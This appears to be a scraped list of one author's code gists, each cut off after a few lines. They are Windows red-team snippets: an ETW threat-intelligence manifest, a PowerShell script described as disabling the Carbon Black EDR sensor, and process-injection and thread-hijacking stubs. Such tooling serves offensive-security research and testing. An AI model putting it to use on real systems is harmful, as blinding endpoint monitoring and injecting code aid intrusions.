slaeryan

<instrumentationManifest xmlns="http://schemas.microsoft.com/win/2004/08/events">
  <instrumentation xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">
    <events>
      <provider name="Microsoft-Windows-Threat-Intelligence" guid="{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}" resourceFileName="Microsoft-Windows-Threat-Intelligence" messageFileName="Microsoft-Windows-Threat-Intelligence" symbol="MicrosoftWindowsThreatIntelligence" source="Xml">
        <keywords>
          <keyword name="KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL" message="$(string.keyword_KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL)" mask="0x1" />
          <keyword name="KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER" message="$(string.keyword_KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER)" mask="0x2" />
          <keyword name="KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE" message="$(string.keyword_KERNEL_THREATINT_KEYWORD_ALLOCVM

slaeryan

<?xml version="1.0" encoding="UTF-8"?>
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.19014.0</VersionEx>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <PolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</PolicyID>
  <BasePolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</BasePolicyID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>

slaeryan

#pragma once

#include <Windows.h>

// Macros
// ------------------------------------------------------------------------

#define STATUS_SUCCESS 0x00000000

#define STATUS_IMAGE_NOT_AT_BASE 0x40000003

slaeryan

#pragma once

#include <Windows.h>

// Ref: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kuser_shared_data/index.htm
#define KUSER_SHARED_DATA 0x7ffe0000
#define MAJOR_VERSION_OFFSET 0x026C
#define MINOR_VERSION_OFFSET 0x0270
#define BUILD_NUMBER_OFFSET 0x0260

slaeryan

using System;
using System.Runtime.InteropServices;

namespace Executioner
{
    [ComVisible(true)]
	public class Executioner
	{
		// API functions
        // ------------------------------------------------------------------------

slaeryan

import binascii
import sys
import re

if __name__ == "__main__":
	
	if len(sys.argv) < 2:
		print("Missing file path")
		sys.exit(0)
		

slaeryan

<#
.SYNOPSIS
    This script will disable the Carbon Black sensor (cb.exe). This will prevent live response and prevent any logs from being sent to the server. This triggers an alert on Carbon Black if 'tamper protection' is enabled. 
.DESCRIPTION
    Sink hole Carbon Black sensor
.NOTES
    FIle Name   : Sinkhole-Carbon-Black-Sensor.ps1
    Requires    : Powershell V2
#>

slaeryan

// Compile with MinGW:
// x86_64-w64-mingw32-g++ aepinjection.cpp -o injector.exe -lntdll -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

#pragma comment(lib, "ntdll")

int main() {    

slaeryan

#include <Windows.h>
#include <string>
#include <stdio.h>

#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Advapi32.lib")

DWORD threadID;

//extern "C" to prevent C++ name mangling

slaeryan

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h> // debugging

HANDLE getThreadHandle(DWORD pid) {
	HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
	if (h != INVALID_HANDLE_VALUE) {
		THREADENTRY32 te;
		te.dwSize = sizeof(te);
		if (Thread32First(h, &te)) {